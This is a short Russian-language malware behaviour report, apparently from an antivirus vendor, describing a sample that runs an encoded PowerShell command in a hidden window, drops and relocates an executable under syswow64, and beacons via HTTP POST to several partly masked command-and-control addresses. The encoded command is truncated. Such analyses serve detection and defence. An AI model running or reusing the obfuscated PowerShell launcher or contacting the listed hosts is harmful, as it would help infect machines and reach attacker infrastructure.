Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AYQByAGMAYQBlAHkAZgB1AHUAbgA9ACcAZgBvAGUAYwBxAHUAaQBzACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQBSAEkAdABgAFkAUABgAFIAbwB0AE8AQwBgAG...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\262.exe
Перемещает следующие файлы
- %HOMEPATH%\262.exe в %WINDIR%\syswow64\shdocvw\sens.exe
Сетевая активность
Подключается к
- '94.##.254.194':80
- '21#.#1.142.238':8080
- '91.##1.166.124':8080
- '16#.#41.92.219':8080
- '79.#8.24.39':8080
- '10#.#17.53.230':443
- '78.##9.165.52':8080
TCP
Запросы HTTP POST
- http://94.##.254.194/G2NU2zj61s/EkIzaiXzWrYug1c/sVb117qy9NpsKzG1hso/w1BSIwncgEp1FM/QMA4wGV4hNogPbmvfqV/
- http://21#.##.142.238:8080/aJqTjvzaEykq7x/n7YDM/yE6Wba9yVw7GELX29uw/ via 21#.#1.142.238
- http://91.###.166.124:8080/oqq8EgqCrQEX3ubg/UeNu68wGM/781aJLJ0PCV/fL6wuXqoq7qX67k/pheT/ via 91.##1.166.124
- http://16#.##1.92.219:8080/spgEm5iT/ via 16#.#41.92.219
- http://10#.##7.53.230:443/XgAg1y4n0OYuPhYxX62/LFJNFqA1/gI0b6ZFZwsPXQnYfgO/odAm5/k16W7Uf8qQqPzpezw/sAcxkz5kn/ via 10#.#17.53.230
UDP
- DNS ASK ph#####ninjarank.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\262.exe'
- '%WINDIR%\syswow64\shdocvw\sens.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AYQByAGMAYQBlAHkAZgB1AHUAbgA9ACcAZgBvAGUAYwBxAHUAaQBzACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQBSAEkAdABgAFkAUABgAFIAbwB0AE8AQwBgAG...' (со скрытым окном)
